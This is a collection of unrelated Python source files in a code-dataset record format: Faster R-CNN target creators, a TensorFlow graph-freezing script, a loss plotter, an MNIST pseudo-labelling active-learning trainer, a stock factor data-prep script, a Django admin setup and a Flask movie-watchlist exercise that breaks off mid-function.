self.pos_ratio = pos_ratio\n self.pos_iou_thresh = pos_iou_thresh\n self.neg_iou_thresh_hi = neg_iou_thresh_hi\n self.neg_iou_thresh_lo = neg_iou_thresh_lo # NOTE:default 0.1 in py-faster-rcnn\n\n def __call__(self, roi, bbox, label, loc_normalize_mean=(0., 0., 0., 0.), loc_normalize_std=(0.1, 0.1, 0.2, 0.2)):\n n_bbox, _ = bbox.shape\n roi = np.concatenate((roi, bbox), axis=0)\n\n pos_roi_per_image = np.round(self.n_sample * self.pos_ratio)\n iou = bbox_iou(roi, bbox)\n gt_assignment = iou.argmax(axis=1)\n max_iou = iou.max(axis=1)\n # Offset range of classes from [0, n_fg_class - 1] to [1, n_fg_class].\n # The label with value 0 is the background.\n gt_roi_label = label[gt_assignment] + 1\n\n # Select foreground RoIs as those with >= pos_iou_thresh IoU.\n pos_index = np.where(max_iou >= self.pos_iou_thresh)[0]\n pos_roi_per_this_image = int(min(pos_roi_per_image, pos_index.size))\n if pos_index.size > 0:\n pos_index = np.random.choice(\n pos_index, size=pos_roi_per_this_image, replace=False)\n\n # Select background RoIs as those within\n # [neg_iou_thresh_lo, neg_iou_thresh_hi).\n neg_index = np.where((max_iou < self.neg_iou_thresh_hi) &\n (max_iou >= self.neg_iou_thresh_lo))[0]\n neg_roi_per_this_image = self.n_sample - pos_roi_per_this_image\n neg_roi_per_this_image = int(min(neg_roi_per_this_image,\n neg_index.size))\n if neg_index.size > 0:\n neg_index = np.random.choice(\n neg_index, size=neg_roi_per_this_image, replace=False)\n\n # The indices that we're selecting (both positive and negative).\n keep_index = np.append(pos_index, neg_index)\n gt_roi_label = gt_roi_label[keep_index]\n gt_roi_label[pos_roi_per_this_image:] = 0 # negative labels --> 0\n sample_roi = roi[keep_index]\n\n # Compute offsets and scales to match sampled RoIs to the GTs.\n gt_roi_loc = to_offsets(sample_roi, bbox[gt_assignment[keep_index]])\n gt_roi_loc = ((gt_roi_loc - np.array(loc_normalize_mean, np.float32)) / np.array(loc_normalize_std, np.float32))\n\n return sample_roi, gt_roi_loc, gt_roi_label\n\n# assign anchor to target\nclass AnchorTargetCreator(object):\n def __init__(self, n_sample=256, pos_iou_thresh=0.7, neg_iou_thresh=0.3, pos_ratio=0.5):\n self.n_sample = n_sample\n self.pos_iou_thresh = pos_iou_thresh\n self.neg_iou_thresh = neg_iou_thresh\n self.pos_ratio = pos_ratio\n\n def __call__(self, bbox, anchor, img_size):\n img_H, img_W = img_size\n n_anchor = len(anchor)\n inside_index = _get_inside_index(anchor, img_H, img_W)\n anchor = anchor[inside_index]\n argmax_ious, label = self._create_label(\n inside_index, anchor, bbox)\n\n # compute bounding box regression targets\n loc = to_offsets(anchor, bbox[argmax_ious])\n\n # map up to original set of anchors\n label = _unmap(label, n_anchor, inside_index, fill=-1)\n loc = _unmap(loc, n_anchor, inside_index, fill=0)\n\n return loc, label\n\n def _create_label(self, inside_index, anchor, bbox):\n # label: 1 is positive, 0 is negative, -1 is dont care\n label = np.empty((len(inside_index),), dtype=np.int32)\n label.fill(-1)\n\n argmax_ious, max_ious, gt_argmax_ious = \\\n self._calc_ious(anchor, bbox, inside_index)\n\n # assign negative labels first so that positive labels can clobber them\n label[max_ious < self.neg_iou_thresh] = 0\n\n # positive label: for each gt, anchor with highest iou\n label[gt_argmax_ious] = 1\n\n # positive label: above threshold IOU\n label[max_ious >= self.pos_iou_thresh] = 1\n\n # subsample positive labels if we have too many\n n_pos = int(self.pos_ratio * self.n_sample)\n pos_index = np.where(label == 1)[0]\n if len(pos_index) > n_pos:\n disable_index = np.random.choice(\n pos_index, size=(len(pos_index) - n_pos), replace=False)\n label[disable_index] = -1\n\n # subsample negative labels if we have too many\n n_neg = self.n_sample - np.sum(label == 1)\n neg_index = np.where(label == 0)[0]\n if len(neg_index) > n_neg:\n disable_index = np.random.choice(\n neg_index, size=(len(neg_index) - n_neg), replace=False)\n label[disable_index] = -1\n\n return argmax_ious, label\n\n def _calc_ious(self, anchor, bbox, inside_index):\n # ious between the anchors and the gt boxes\n ious = bbox_iou(anchor, bbox)\n argmax_ious = ious.argmax(axis=1)\n max_ious = ious[np.arange(len(inside_index)), argmax_ious]\n gt_argmax_ious = ious.argmax(axis=0)\n gt_max_ious = ious[gt_argmax_ious, np.arange(ious.shape[1])]\n gt_argmax_ious = np.where(ious == gt_max_ious)[0]\n\n return argmax_ious, max_ious, gt_argmax_ious\n\n\ndef _unmap(data, count, index, fill=0):\n # Unmap a subset of item (data) back to the original set of items (of\n # size count)\n\n if len(data.shape) == 1:\n ret = np.empty((count,), dtype=data.dtype)\n ret.fill(fill)\n ret[index] = data\n else:\n ret = np.empty((count,) + data.shape[1:], dtype=data.dtype)\n ret.fill(fill)\n ret[index, :] = data\n return ret\n\n\ndef _get_inside_index(anchor, H, W):\n # Calc indicies of anchors which are located completely inside of the image\n # whose size is speficied.\n index_inside = np.where(\n (anchor[:, 0] >= 0) &\n (anchor[:, 1] >= 0) &\n (anchor[:, 2] <= W) &\n (anchor[:, 3] <= H)\n )[0]\n return index_inside\n\n\nclass ProposalCreator:\n def __init__(self,\n parent_model,\n nms_thresh=0.7,\n n_train_pre_nms=12000,\n n_train_post_nms=2000,\n n_test_pre_nms=6000,\n n_test_post_nms=300,\n min_size=16\n ):\n self.parent_model = parent_model\n self.nms_thresh = nms_thresh\n self.n_train_pre_nms = n_train_pre_nms\n self.n_train_post_nms = n_train_post_nms\n self.n_test_pre_nms = n_test_pre_nms\n self.n_test_post_nms = n_test_post_nms\n self.min_size = min_size\n\n def __call__(self, loc, score, anchor, img_size, scale=1.):\n if self.parent_model.training:\n n_pre_nms = self.n_train_pre_nms\n n_post_nms = self.n_train_post_nms\n else:\n n_pre_nms = self.n_test_pre_nms\n n_post_nms = self.n_test_post_nms\n\n # Convert anchors into proposal via bbox transformations.\n # roi = to_real_bbox(anchor, loc)\n roi = to_real_bbox(anchor, loc)\n \n # Clip predicted boxes to image.\n roi[:, slice(0, 4, 2)] = np.clip(roi[:, slice(0, 4, 2)], 0, img_size[0])\n roi[:, slice(1, 4, 2)] = np.clip(roi[:, slice(1, 4, 2)], 0, img_size[1])\n\n # Remove predicted boxes with either height or width < threshold.\n min_size = self.min_size * scale\n hs = roi[:, 3] - roi[:, 1]\n ws = roi[:, 2] - roi[:, 0]\n keep = np.where((hs >= min_size) & (ws >= min_size))[0]\n roi = roi[keep, :]\n score = score[keep]\n\n # Sort all (proposal, score) pairs by score from highest to lowest.\n # Take top pre_nms_topN (e.g. 6000).\n order = score.ravel().argsort()[::-1]\n if n_pre_nms > 0:\n order = order[:n_pre_nms]\n roi = roi[order, :]\n score = score[order]\n # Apply nms (e.g. threshold = 0.7).\n # Take after_nms_topN (e.g. 300).\n\n # unNOTE: somthing is wrong here!\n # TODO: remove cuda.to_gpu\n keep = nms(\n torch.from_numpy(roi).cuda() if cig.use_cuda else torch.from_numpy(roi).cpu(),\n torch.from_numpy(score).cuda() if cig.use_cuda else torch.from_numpy(score).cpu(),\n self.nms_thresh\n )\n if n_post_nms > 0:\n keep = keep[:n_post_nms]\n roi = roi[keep.cpu().numpy()]\n return roi\n","sub_path":"face_detection/utils/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":9249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"390639317","text":"import tensorflow as tf\n\nimport argparse\n\n# command line arguments\nparser = argparse.ArgumentParser(\n description='Convert a checkpoint to frozen graph')\nparser.add_argument(\n '--checkpoint',\n type=str,\n default=\"model.ckpt\",\n help='The checkpoint file to be converted')\nparser.add_argument(\n '--graph',\n type=str,\n default=\"graph.pb\",\n help='Output graph name.')\n\nargs = parser.parse_args()\n\n\n# add pb extension if not present\nif not args.graph.endswith(\".pb\"):\n args.graph = args.graph + \".pb\"\n\n# initialise the saver\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess:\n # restore all variables from checkpoint\n saver.restore(sess, args.checkpoint)\n\n # node that are required output nodes\n output_node_names = [\"Openpose/concat_stage7\"]\n\n # We use a built-in TF helper to export variables to constants\n output_graph_def = tf.graph_util.convert_variables_to_constants(\n sess,\n tf.get_default_graph().as_graph_def(),\n # The graph_def is used to retrieve the nodes\n output_node_names # The output node names are used to select the usefull nodes\n )\n\n # convert variables to constants\n output_graph_def = tf.graph_util.remove_training_nodes(output_graph_def)\n\n # Finally we serialize and dump the output graph to the filesystem\n output_graph = args.graph\n with tf.gfile.GFile(output_graph, \"wb\") as f:\n f.write(output_graph_def.SerializeToString())\n\n print(\"Frozen graph file {} created successfully\".format(args.graph))","sub_path":"tensorflow_checkpoint_to_graph.py","file_name":"tensorflow_checkpoint_to_graph.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"382004131","text":"# -*- coding: utf-8 -*-\n# @Time : 18-8-11 下午6:54\n# @Author : unicoe\n# @Email : unicoe@163.com\n# @File : draw_loss.py\n# @Software: PyCharm Community Edition\n\nimport re\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pdb\n\nrf = open(\"/home/user/PycharmProjects/setting_weight_by_learn/src/loss.txt\")\n\ncontent = rf.readline()\n\nresult = []\n\nwhile content:\n res = re.findall(\"\\[\\d.\\d+\\]\",content)\n\n if len(res) != 0:\n tmp = res[0][1:-2]\n result.append(float(tmp))\n content = rf.readline()\n\ndraw_train_all_loss = pd.Series(result, index = range(0,len(result),1))\n\n#draw\nfig = plt.figure()\nw = 25\nh = 10\nfig.set_size_inches(w,h)\n\nplt.plot(draw_train_all_loss,'r')\nplt.title(u\"all loss\")\n#plt.legend((u'accuracy'),loc='best')\nplt.xlabel(u\"iter\")\nplt.ylabel(u\"loss\")\n\n\nplt.savefig(\"/home/user/PycharmProjects/setting_weight_by_learn/img/loss_add_wegiht_08_11.png\")\n#save format maybe : format=\"eps\" or \"pdf\"\n\n\nplt.show()\n","sub_path":"some_learn/Data_Set_handle/Caltech-Dateset/setting_weight_by_learn/src/pdb_learn_draw_loss.py","file_name":"pdb_learn_draw_loss.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"62834005","text":"import pickle\nfrom collections import defaultdict\nfrom pathlib import Path\nfrom typing import Optional, Callable\n\nimport numpy as np\nimport torch\nimport torch.utils.data as torchdata\nfrom ignite.contrib.handlers import ProgressBar\nfrom ignite.engine import create_supervised_evaluator, Events, Engine\nfrom ignite.metrics import Accuracy, Loss\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom alr import ALRModel\nfrom alr import MCDropout\nfrom alr.acquisition import BALD\nfrom alr.data import DataManager\nfrom alr.data import RelabelDataset, PseudoLabelDataset, UnlabelledDataset\nfrom alr.data.datasets import Dataset\nfrom alr.training import Trainer\nfrom alr.training.samplers import RandomFixedLengthSampler\nfrom alr.training.utils import EarlyStopper, PLPredictionSaver\nfrom alr.utils import eval_fwd_exp, timeop, manual_seed\nfrom alr.utils._type_aliases import _DeviceType, _Loss_fn\n\n\nclass PseudoLabelManager:\n def __init__(\n self,\n pool: UnlabelledDataset,\n model: nn.Module,\n threshold: float,\n log_dir: Optional[str] = None,\n device: _DeviceType = None,\n **kwargs,\n ):\n bs = kwargs.pop(\"batch_size\", 1024)\n shuffle = kwargs.pop(\"shuffle\", False)\n assert not shuffle\n self._pool = pool\n self._loader = torchdata.DataLoader(\n pool, batch_size=bs, shuffle=shuffle, **kwargs\n )\n self._model = model\n self._log_dir = log_dir\n self._device = device\n self._threshold = threshold\n self.acquired_sizes = []\n\n def attach(self, engine: Engine):\n engine.add_event_handler(Events.STARTED, self._initialise)\n # could also be EPOCH_COMPLETED since there's only one iteration in each epoch\n engine.add_event_handler(Events.ITERATION_COMPLETED, self._load_labels)\n\n def _load_labels(self, engine: Engine):\n evaluator = create_supervised_evaluator(\n self._model, metrics=None, device=self._device\n )\n plc = PseudoLabelCollector(\n self._threshold,\n log_dir=self._log_dir,\n )\n plc.attach(evaluator, batch_size=self._loader.batch_size)\n plc.global_step_from_engine(engine)\n evaluator.run(self._loader)\n indices, pseudo_labels = (\n evaluator.state.pl_indices.cpu().numpy(),\n evaluator.state.pl_plabs.cpu().numpy(),\n )\n self.acquired_sizes.append(indices.shape[0])\n if indices.shape[0]:\n confident_points = torchdata.Subset(self._pool, indices)\n if self._pool.debug:\n # pool returns target labels too\n engine.state.pseudo_labelled_dataset = RelabelDataset(\n confident_points, pseudo_labels\n )\n else:\n engine.state.pseudo_labelled_dataset = PseudoLabelDataset(\n confident_points, pseudo_labels\n )\n else:\n engine.state.pseudo_labelled_dataset = None\n\n @staticmethod\n def _initialise(engine: Engine):\n engine.state.pseudo_labelled_dataset = None\n\n\nclass PseudoLabelCollector:\n def __init__(\n self,\n threshold: float,\n log_dir: Optional[str] = None,\n pred_transform: Callable[[torch.Tensor], torch.Tensor] = lambda x: x.exp(),\n ):\n self._indices = []\n self._plabs = []\n self._pred_transform = pred_transform\n self._output_transform = lambda x: x\n self._thresh = threshold\n self._targets = []\n self._preds = []\n if log_dir:\n self._saver = PLPredictionSaver(log_dir, pred_transform=pred_transform)\n else:\n self._saver = None\n self._batch_size = None\n\n def _parse(self, engine: Engine):\n preds, targets = self._output_transform(engine.state.output)\n # state.iteration starts with 1\n iteration = engine.state.iteration - 1\n offset = iteration * self._batch_size\n with torch.no_grad():\n preds = self._pred_transform(preds)\n preds_max, plabs = torch.max(preds, dim=-1)\n mask = torch.nonzero(preds_max >= self._thresh).flatten()\n if mask.shape[0]:\n # plabs = [N,]\n self._plabs.append(plabs[mask])\n self._indices.append(mask + offset)\n\n def _flush(self, engine: Engine):\n if self._indices and self._plabs:\n engine.state.pl_indices = torch.cat(self._indices)\n engine.state.pl_plabs = torch.cat(self._plabs)\n else:\n engine.state.pl_indices = torch.Tensor([])\n engine.state.pl_plabs = torch.Tensor([])\n self._indices = []\n self._plabs = []\n\n def attach(self, engine: Engine, batch_size: int, output_transform=lambda x: x):\n r\"\"\"\n\n Args:\n engine (Engine): ignite engine object\n batch_size (int): engine's batch size\n output_transform (Callable): if engine.state.output is not (preds, target),\n then output_transform should return aforementioned tuple.\n\n Returns:\n NoneType: None\n \"\"\"\n engine.add_event_handler(Events.ITERATION_COMPLETED, self._parse)\n engine.add_event_handler(Events.COMPLETED, self._flush)\n self._output_transform = output_transform\n self._batch_size = batch_size\n if self._saver:\n self._saver.attach(engine, output_transform=output_transform)\n\n def global_step_from_engine(self, engine: Engine):\n if self._saver:\n self._saver.global_step_from_engine(engine)\n\n\ndef _update_dataloader(\n loader: torchdata.DataLoader,\n dataset: torchdata.Dataset,\n sampler: Optional[torchdata.Sampler] = None,\n):\n # attributes that usually go in dataloader's constructor\n attrs = [k for k in loader.__dict__.keys() if not k.startswith(\"_\")]\n drop = [\"dataset\", \"sampler\", \"batch_sampler\", \"dataset_kind\"]\n kwargs = {k: getattr(loader, k) for k in attrs if k not in drop}\n if not isinstance(\n loader.sampler,\n (\n torchdata.SequentialSampler,\n torchdata.RandomSampler,\n RandomFixedLengthSampler,\n ),\n ):\n raise ValueError(\n f\"Only sequential, random, and random fixed length samplers \"\n f\"are supported in _update_dataloader\"\n )\n kwargs[\"dataset\"] = dataset\n # Sequential and Random will be automatically determined if sampler is None (depending on shuffle)\n kwargs[\"sampler\"] = sampler\n return torchdata.DataLoader(**kwargs)\n\n\ndef create_pseudo_label_trainer(\n model: ALRModel,\n loss: _Loss_fn,\n optimiser: str,\n train_loader: torchdata.DataLoader,\n val_loader: torchdata.DataLoader,\n pseudo_label_manager: PseudoLabelManager,\n rfls_len: Optional[int] = None,\n patience: Optional[int] = None,\n reload_best: Optional[bool] = None,\n epochs: Optional[int] = 1,\n device: _DeviceType = None,\n *args,\n **kwargs,\n):\n def _step(engine: Engine, _):\n # update loader accordingly: if pld is not none, concatenate them\n new_loader = train_loader\n pld = engine.state.pseudo_labelled_dataset\n if pld is not None:\n # only reset weights if engine.state.epoch != 1\n model.reset_weights()\n train_ds = torchdata.ConcatDataset((train_loader.dataset, pld))\n # update dataloader's dataset attribute\n if rfls_len:\n new_loader = _update_dataloader(\n train_loader,\n train_ds,\n RandomFixedLengthSampler(train_ds, length=rfls_len, shuffle=True),\n )\n else:\n new_loader = _update_dataloader(train_loader, train_ds)\n else:\n assert engine.state.epoch == 1\n\n # begin supervised training\n trainer = Trainer(\n model,\n loss,\n optimiser,\n patience,\n reload_best,\n device=device,\n *args,\n **kwargs,\n )\n history = trainer.fit(\n new_loader,\n val_loader=val_loader,\n epochs=epochs,\n )\n\n # if early stopping was applied w/ patience, then the actual train acc and loss should be\n # -patience from the final loss/acc UNLESS we reached the maximum number of epochs.\n if patience and len(history[\"train_loss\"]) != epochs:\n return history[\"train_loss\"][-patience], history[\"train_acc\"][-patience]\n return history[\"train_loss\"][-1], history[\"train_acc\"][-1]\n\n e = Engine(_step)\n pseudo_label_manager.attach(e)\n return e\n\n\nclass EphemeralTrainer:\n def __init__(\n self,\n model: ALRModel,\n pool: UnlabelledDataset,\n loss: _Loss_fn,\n optimiser: str,\n threshold: float,\n random_fixed_length_sampler_length: Optional[int] = None,\n log_dir: Optional[str] = None,\n patience: Optional[int] = None,\n reload_best: Optional[bool] = False,\n device: _DeviceType = None,\n pool_loader_kwargs: Optional[dict] = {},\n *args,\n **kwargs,\n ):\n self._pool = pool\n self._model = model\n self._loss = loss\n self._optimiser = optimiser\n self._patience = patience\n self._reload_best = reload_best\n self._device = device\n self._args = args\n self._kwargs = kwargs\n self._threshold = threshold\n self._log_dir = log_dir\n self._pool_loader_kwargs = pool_loader_kwargs\n self._rfls_len = random_fixed_length_sampler_length\n\n def fit(\n self,\n train_loader: torchdata.DataLoader,\n val_loader: Optional[torchdata.DataLoader] = None,\n iterations: Optional[int] = 1,\n epochs: Optional[int] = 1,\n ):\n if self._patience and val_loader is None:\n raise ValueError(\n \"If patience is specified, then val_loader must be provided in .fit().\"\n )\n\n val_evaluator = create_supervised_evaluator(\n self._model,\n metrics={\"acc\": Accuracy(), \"loss\": Loss(self._loss)},\n device=self._device,\n )\n\n history = defaultdict(list)\n pbar = ProgressBar()\n\n def _log_metrics(engine: Engine):\n # train_loss and train_acc are moving averages of the last epoch\n # in the supervised training loop\n train_loss, train_acc = engine.state.output\n history[f\"train_loss\"].append(train_loss)\n history[f\"train_acc\"].append(train_acc)\n pbar.log_message(\n f\"Eph. iteration {engine.state.epoch}/{engine.state.max_epochs}\\n\"\n f\"\\ttrain acc = {train_acc}, train loss = {train_loss}\"\n )\n if val_loader is None:\n return # job done\n # val loader - save to history and print metrics. Also, add handlers to\n # evaluator (e.g. early stopping, model checkpointing that depend on val_acc)\n metrics = val_evaluator.run(val_loader).metrics\n\n history[f\"val_acc\"].append(metrics[\"acc\"])\n history[f\"val_loss\"].append(metrics[\"loss\"])\n pbar.log_message(\n f\"\\tval acc = {metrics['acc']}, val loss = {metrics['loss']}\"\n )\n\n pseudo_label_manager = PseudoLabelManager(\n pool=self._pool,\n model=self._model,\n threshold=self._threshold,\n log_dir=self._log_dir,\n device=self._device,\n **self._pool_loader_kwargs,\n )\n trainer = create_pseudo_label_trainer(\n model=self._model,\n loss=self._loss,\n optimiser=self._optimiser,\n train_loader=train_loader,\n val_loader=val_loader,\n pseudo_label_manager=pseudo_label_manager,\n rfls_len=self._rfls_len,\n patience=self._patience,\n reload_best=self._reload_best,\n epochs=epochs,\n device=self._device,\n *self._args,\n **self._kwargs,\n )\n # output of trainer are running averages of train_loss and train_acc (from the\n # last epoch of the supervised trainer)\n pbar.attach(trainer, output_transform=lambda x: {\"loss\": x[0], \"acc\": x[1]})\n if val_loader is not None and self._patience:\n es = EarlyStopper(\n self._model, self._patience, trainer, key=\"acc\", mode=\"max\"\n )\n es.attach(val_evaluator)\n trainer.add_event_handler(Events.EPOCH_COMPLETED, _log_metrics)\n trainer.run(\n range(iterations),\n max_epochs=iterations,\n epoch_length=1,\n )\n if val_loader is not None and self._patience and self._reload_best:\n es.reload_best()\n\n history[\"train_size\"] = np.array(pseudo_label_manager.acquired_sizes) + len(\n train_loader.dataset\n )\n return history\n\n def evaluate(self, data_loader: torchdata.DataLoader) -> dict:\n evaluator = create_supervised_evaluator(\n self._model,\n metrics={\"acc\": Accuracy(), \"loss\": Loss(self._loss)},\n device=self._device,\n )\n return evaluator.run(data_loader).metrics\n\n\ndef main(threshold: float, b: int):\n manual_seed(42)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n kwargs = dict(num_workers=4, pin_memory=True)\n\n BATCH_SIZE = 64\n REPS = 6\n ITERS = 24\n VAL_SIZE = 5_000\n MIN_TRAIN_LEN = 12_500\n SSL_ITERATIONS = 200\n EPOCHS = 200\n\n accs = defaultdict(list)\n\n template = f\"thresh_{threshold}_b_{b}\"\n calib_metrics = Path(\"calib_metrics\") / template\n saved_models = Path(\"saved_models\") / template\n metrics = Path(\"metrics\") / template\n calib_metrics.mkdir(parents=True)\n saved_models.mkdir(parents=True)\n metrics.mkdir(parents=True)\n\n train, pool, test = Dataset.MNIST.get_fixed()\n val, pool = torchdata.random_split(pool, (VAL_SIZE, len(pool) - VAL_SIZE))\n pool = UnlabelledDataset(pool)\n test_loader = torchdata.DataLoader(test, batch_size=512, shuffle=False, **kwargs)\n val_loader = torchdata.DataLoader(val, batch_size=512, shuffle=False, **kwargs)\n\n for r in range(1, REPS + 1):\n model = MCDropout(Dataset.MNIST.model, forward=20, fast=True).to(device)\n bald = BALD(eval_fwd_exp(model), device=device, batch_size=512, **kwargs)\n dm = DataManager(train, pool, bald)\n dm.reset() # to reset pool\n print(f\"=== repeat #{r} of {REPS} ===\")\n for i in range(1, ITERS + 1):\n # don't reset weights: let ephemeral trainer take care of it\n # since we're collecting calibration metrics,\n # make pool return targets too. (i.e. debug mode)\n with dm.unlabelled.tmp_debug():\n trainer = EphemeralTrainer(\n model,\n dm.unlabelled,\n F.nll_loss,\n \"Adam\",\n threshold=threshold,\n random_fixed_length_sampler_length=MIN_TRAIN_LEN,\n log_dir=(calib_metrics / f\"rep_{r}\" / f\"iter_{i}\"),\n patience=3,\n reload_best=True,\n device=device,\n pool_loader_kwargs=kwargs,\n )\n train_loader = torchdata.DataLoader(\n dm.labelled,\n batch_size=BATCH_SIZE,\n sampler=RandomFixedLengthSampler(\n dm.labelled, MIN_TRAIN_LEN, shuffle=True\n ),\n **kwargs,\n )\n with timeop() as t:\n history = trainer.fit(\n train_loader,\n val_loader,\n iterations=SSL_ITERATIONS,\n epochs=EPOCHS,\n )\n # eval on test set\n test_metrics = trainer.evaluate(test_loader)\n accs[dm.n_labelled].append(test_metrics[\"acc\"])\n print(f\"-- Iteration {i} of {ITERS} --\")\n print(\n f\"\\ttrain: {dm.n_labelled}; pool: {dm.n_unlabelled}\\n\"\n f\"\\t[test] acc: {test_metrics['acc']}; time: {t}\"\n )\n\n # save stuff\n with open(metrics / f\"rep_{r}_iter_{i}.pkl\", \"wb\") as fp:\n payload = {\n \"history\": history,\n \"test_metrics\": test_metrics,\n \"labelled_classes\": dm.unlabelled.labelled_classes,\n \"labelled_indices\": dm.unlabelled.labelled_indices,\n }\n pickle.dump(payload, fp)\n torch.save(model.state_dict(), saved_models / f\"rep_{r}_iter_{i}.pth\")\n\n # finally, acquire points\n dm.acquire(b)\n\n with open(f\"{template}_accs.pkl\", \"wb\") as fp:\n pickle.dump(accs, fp)\n\n\nif __name__ == \"__main__\":\n main(threshold=0.95, b=10)\n","sub_path":"docs/source/experiments/old/ephemeral/mnist/legacy/dont_reset_weights_more_iters/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242970747","text":"import numpy as np\nimport pandas as pd\n\ndf = pd.read_csv('../../data/spx2014to2017.csv', index_col = 'date', parse_dates = True)\ndf.drop(df.index[0], inplace = True)\n# df.count() # this could help\ndf.dropna(inplace=True, axis = 1)\n\n# risk free rate\nrisk_free = df[\"USGG10YR Index\"] / 100\n\n# forward looking YoY returns\nspx = df[\"SPX INDEX\"]\nyoy = spx.pct_change(250).shift(-250)\nyoy.dropna(inplace = True)\n\n# Forward looking annual returns for all index members\nann_returns = df.pct_change(250).shift(-250)\nann_returns.dropna(inplace = True, axis = 0, how = 'all')\nann_returns.drop(\"USGG10YR Index\", inplace=True, axis = 1)\n\n\n# subtract risk free returns as qutoed on the day from forward annual stock returns to get excess annual returns\nexcess_returns = ann_returns.subtract(risk_free, axis = 0)\nexcess_returns.drop('SPX INDEX', axis = 1, inplace=True)\nexcess_returns.dropna(inplace=True, how='all')\n\n\n# Save that shit so I don't have to do it again\n#excess_returns.to_csv('../data/excess_returns.csv')\n\n# Get the Factor data and set categories as large and small market cap - I just took the most recent market cap, but I think historical market cap (based on the first day of forward looking returns) should be used. I'm not sure if using an updating market cap would be beneficial since it's based on the price.\n# using that sweet French sauce\nfactor_returns = pd.read_csv('../../data/factors.csv', parse_dates=True, index_col = 'date')\n\n\n# this might be wrong because these are daily returns - not annual returns\n# you want the annual geometric average of factor returns lagged by one year\nnew_data = excess_returns.merge(factor_returns, left_index=True, right_index=True)","sub_path":"chap3/fm/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443150896","text":"from django.contrib import admin\n#from django.db import models as django_models\n#from django.forms.extras.widgets import SelectDateWidget\nfrom gigs.gig_registry import models\n\n\nclass VenueAdmin(admin.ModelAdmin):\n prepopulated_fields = {'uid':('name',)}\n\nclass MusicianInline(admin.TabularInline):\n fields = ['musician', 'started', 'finished', 'date_of_birth', 'instrument',]\n model = models.Musician\n\n#class MusicianAdmin(admin.ModelAdmin):\n# inlines = [MembershipInline]\n\nclass MembershipAdmin(admin.ModelAdmin):\n pass#inlines = [MusicianInline]\n\nclass MembershipInline(admin.TabularInline):\n model = models.BandMembership\n verbose_name = \"Band Member\"\n verbose_name_plural = \"Band Members\"\n fields = ['musician', 'started', 'finished']\n\n extra = 3\n\nclass BandAdmin(admin.ModelAdmin):\n inlines = [MembershipInline]\n\nclass BandInline(admin.TabularInline):\n model = models.Gig.bands.through\n\n\nclass GigAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields': ['name', 'venue','bands', 'cost']}),\n ('Dates', {'fields': ['start', 'finish']}),\n ('Meta', {'fields': ['comment']}),\n ]\n \n filter_horizontal = ('bands',)\n list_filter = ('venue', 'bands',)\n\nclass VenueAdmin(admin.ModelAdmin):\n list_display = ['name', 'location']\n\nclass LocationAdmin(admin.ModelAdmin):\n #fields = ['street_address', 'suburb', 'state', 'post_code', 'country', 'lat', 'lon']\n fieldsets = [\n ('Address', \n {'fields': \n [\n 'street_address', \n 'suburb', \n 'state', \n 'post_code', \n 'country', \n ]\n }\n ),\n ('Co-ordinates',\n {'fields':\n [\n 'lat',\n 'lon',\n ]\n }\n )\n ]\n\nadmin.site.register(models.Band, BandAdmin)\nadmin.site.register(models.Musician)\nadmin.site.register(models.Owner)\nadmin.site.register(models.Venue, VenueAdmin)\nadmin.site.register(models.Location, LocationAdmin)\nadmin.site.register(models.Genre)\nadmin.site.register(models.Gig, GigAdmin)\nadmin.site.register(models.BandMembership, MembershipAdmin)\n","sub_path":"gigs/gig_registry/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228127828","text":"from flask import Flask, request, redirect, render_template\nimport cgi\n\napp = Flask(__name__)\napp.config['DEBUG'] = True # Displays runtime errors in the browser, too.\n\n# A list of movies that nobody should have to watch.\nterrible_movies = [\n \"Gigli\",\n \"Star Wars Episode 1: Attack of the Clones\",\n \"Paul Blart: Mall Cop 2\",\n \"Nine Lives\",\n \"Mission to Mars\"\n]\n\ndef get_current_watchlist():\n # Returns user's current watchlist -- hard coded for now\n return [\"Heartbreakers\", \"She-Devil\", \"Jackie Brown\", \"Heathers\", \"Death Becomes Her\"]\n\n# TODO ---\n# Modify \"My Watchlist\" so you eliminate the need for the \"crossoff\" form in\n# edit.html. Now, next to every list item/movie listed in \"My Watchlist\" you\n# should display a button that says \"I Watched It!\".\n# Clicking the button will result in a confirmation message that the movie has\n# been watched. So, you'll need to add a form withint the <li> tags of \"My\n# Watchlist\". Once this is done, delete the \"crossoff\" form in edit.html\n\n# TODO ---\n# Make a ratings.html template which lists all movies that have been crossed off.\n# It should have a header of <h2>Movies I Have Watched</h2>\n# Add a form for rating EACH list item/movie using a <select> dropdown with\n# the options/values in this list: [\"How was it?\", \"*\", \"**\", \"***\", \"****\", \n# \"*****\"] And with a button that says \"Rate It!\" to submit the user's rating.\n# Give this form the action of \"/rating-confirmation\" and the method of post.\n\n# TODO ---\n# Add a function, movie_ratings, to handle a get request and render the template\n# at \"/ratings\"\n@app.route(\"/ratings\", methods=['GET'])\ndef ratings():\n return render_template(\"ratings.html\", watchedlist = get_watched_movies())\n\n# TODO ---\n# Add a funciton, get_watched_movies, to get the list of crossed off movies. For\n# now, create a hard-coded list with a few movie titles.\ndef get_watched_movies():\n return [\"But I'm a Cheerleader\", \"Saved!\", \"Visitor Q\", \"Onmyoji\", \"Best in Show\"]\n\n# TODO ---\n# Make a rating-confirmation.html template, to be displayed with the user rates\n# a movie they have crossed off.\n\n# TODO ---\n# Create a rate_movie function that handles a post request on \n# /rating-confirmation and renders the 'rating-confirmation' template.\n@app.route(\"/rating-confirmation\", methods=['POST'])\ndef rating_confirmation():\n 